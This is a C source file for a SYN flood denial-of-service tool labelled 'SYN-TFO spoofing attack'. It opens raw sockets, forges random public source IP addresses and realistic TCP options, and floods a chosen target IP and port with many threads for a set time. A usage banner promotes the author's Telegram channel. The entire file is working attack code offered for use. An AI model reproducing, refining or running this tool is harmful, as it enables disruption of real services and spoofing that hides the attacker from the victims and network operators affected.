SYN-TFO伪造攻击.c
/*--------------------------------------------------*\
SYN-TFO伪造攻击
作者:alpha
编译方法:gcc -o syntfo syntfo.c -pthread
\*--------------------------------------------------*/
#include <unistd.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <pthread.h>
#include <netinet/tcp.h>
#include <netinet/ip.h>
#include <netinet/in.h>
#include <netinet/if_ether.h>
#include <netdb.h>
#include <net/if.h>
#include <arpa/inet.h>
#include <netinet/udp.h>
#include <linux/types.h>
#define MAX_PACKET_SIZE 65534
#define PHI 0x9e3779b9
#define MY_MAXTTL 64
static unsigned long int Q[4096], c = 362436;
static unsigned int floodport;
static uint32_t my_tcp_seq = 0;
static uint32_t my_tcp_ack = 0;
void init_rand(unsigned long int x)
{
int i;
Q[0] = x;
Q[1] = x + PHI;
Q[2] = x + PHI + PHI;
for (i = 3; i < 4096; i++)
Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
}
unsigned long int rand_cmwc(void)
{
unsigned long long int t, a = 18782LL;
static unsigned long int i = 4095;
unsigned long int x, r = 0xfffffffe;
i = (i + 1) & 4095;
t = a * Q[i] + c;
c = (t >> 32);
x = t + c;
if (x < c) {
x++;
c++;
}
return (Q[i] = r - x);
}
// 简化的随机数生成函数
int randnum(int min, int max) {
return rand_cmwc() % (max - min + 1) + min;
}
unsigned short csum(unsigned short *buf, int count)
{
register unsigned long sum = 0;
while (count > 1) {
sum += *buf++;
count -= 2;
}
if (count > 0)
sum += *(unsigned char *)buf;
while (sum >> 16)
sum = (sum & 0xffff) + (sum >> 16);
return (unsigned short)(~sum);
}
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph, int tcp_len)
{
struct tcp_pseudo {
unsigned long src_addr;
unsigned long dst_addr;
unsigned char zero;
unsigned char proto;
unsigned short length;
} pseudohead;
pseudohead.src_addr = iph->saddr;
pseudohead.dst_addr = iph->daddr;
pseudohead.zero = 0;
pseudohead.proto = IPPROTO_TCP;
pseudohead.length = htons(tcp_len);
int totaltcp_len = sizeof(struct tcp_pseudo) + tcp_len;
unsigned short *tcp = malloc(totaltcp_len);
memcpy((unsigned char *)tcp, &pseudohead, sizeof(struct tcp_pseudo));
memcpy((unsigned char *)tcp + sizeof(struct tcp_pseudo), (unsigned char *)tcph, tcp_len);
unsigned short output = csum(tcp, totaltcp_len);
free(tcp);
return output;
}
void setup_ip_header(struct iphdr *iph, int payload_size)
{
iph->ihl = 5;
iph->version = 4;
iph->tos = 0;
iph->tot_len = htons(sizeof(struct iphdr) + sizeof(struct tcphdr) + 20 + payload_size); // 修复 tot_len 计算
iph->id = rand_cmwc();
iph->frag_off = htons(0x4000);
iph->ttl = MY_MAXTTL;
iph->protocol = IPPROTO_TCP;
iph->check = 0; // 在填充所有字段后计算校验和
}
void setup_tcp_header(struct tcphdr *tcph)
{
tcph->source = htons(randnum(1024, 65535));
tcph->dest = htons(floodport);
tcph->seq = htonl(my_tcp_seq++);
tcph->ack_seq = htonl(my_tcp_ack);//等待传递ack的值
tcph->syn = 1;
tcph->window = htons(randnum(1024, 65535));
tcph->doff = (sizeof(struct tcphdr) + 20) / 4; // TCP 选项长度为 20
tcph->check = 0; // 在填充所有字段后计算校验和
// TCP 选项 - MSS, SACK_PERM, TS, NOP, WScale
unsigned char options[] = {
0x02, 0x04, 0x05, 0xb4, // MSS, 1460
0x04, 0x02, // SACK Permitted
0x08, 0x0a, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, // Timestamp (TSval, TSecr)
0x01, 0x03, 0x03, 0x07 // Window scale, 7
};
memcpy((void*)tcph + sizeof(struct tcphdr), options, sizeof(options));
}
void *flood(void *par1)
{
char *td = (char *)par1;
char datagram[MAX_PACKET_SIZE];
struct iphdr *iph = (struct iphdr *)datagram;
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
struct sockaddr_in sin;
unsigned char *options = (unsigned char *)tcph + sizeof(struct tcphdr);
int payload_size = 24; //固定 payloa大小
char *payload = (char *)(tcph + 1) + 20;
memset(payload, 0, payload_size);
sin.sin_family = AF_INET;
sin.sin_port = htons(floodport);
sin.sin_addr.s_addr = inet_addr(td);
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
if (s < 0) {
perror("socket");
exit(1);
}
int tmp = 1;
const int *val = &tmp;
if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0) {
perror("setsockopt");
exit(1);
}
memset(datagram, 0, MAX_PACKET_SIZE);
while (1)
{
__be32 spoofed_ip;
do {
spoofed_ip = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
} while (
IN_BADCLASS(spoofed_ip) ||
(((spoofed_ip >> 24) & 0xff) == 10) ||
(((spoofed_ip >> 24) & 0xff) == 172 && ((spoofed_ip >> 16) & 0xf0) == 16) ||
(((spoofed_ip >> 24) & 0xff) == 192 && ((spoofed_ip >> 16) & 0xff) == 168) ||
(spoofed_ip >> 24 & 0xFF) == 127 ||
spoofed_ip == 0 ||
(spoofed_ip >> 24 & 0xFF) == 255 ||
(spoofed_ip >> 28 & 0xF) == 0xE
);
iph->saddr = spoofed_ip;
iph->daddr = sin.sin_addr.s_addr;
setup_ip_header(iph, payload_size);
setup_tcp_header(tcph);
struct timespec ts;
clock_gettime(CLOCK_MONOTONIC, &ts);
uint32_t tsval = ts.tv_sec * 1000 + ts.tv_nsec / 1000000;
//递增TSval
static uint32_t last_tsval = 0;
if (tsval <= last_tsval) {
tsval = last_tsval + 1;
}
last_tsval = tsval;
uint32_t tsecr = rand_cmwc();
memcpy(options + 8, &tsval, 4);
memcpy(options + 12, &tsecr, 4);
iph->check = csum((unsigned short *)datagram, sizeof(struct iphdr));
tcph->check = tcpcsum(iph, tcph, sizeof(struct tcphdr) + 20 + payload_size);
if (sendto(s, datagram, ntohs(iph->tot_len), 0, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
perror("sendto failed");
}
}
}
int main(int argc, char *argv[])
{
if (argc < 6)
{
fprintf(stderr, "\x1b[1;31m 阿尔法(@alphachnhk)官方频道:https://t.me/alphahackerpay \n");
fprintf(stdout, "使用方法: %s <目标 IP> <目标端口> <线程> <pps大小,-1表示无限制> <时间>\n", argv[0]);
exit(-1);
}
fprintf(stdout, "设置套接字...\n");
int num_threads = atoi(argv[3]);
floodport = atoi(argv[2]);
int maxpps = atoi(argv[4]);
pthread_t thread[num_threads];
init_rand(time(NULL));
for (int i = 0; i < num_threads; i++)
{
pthread_create(&thread[i], NULL, &flood, (void *)argv[1]);
}
fprintf(stdout, "开始攻击...\n");
sleep(atoi(argv[5]));
return 0;
}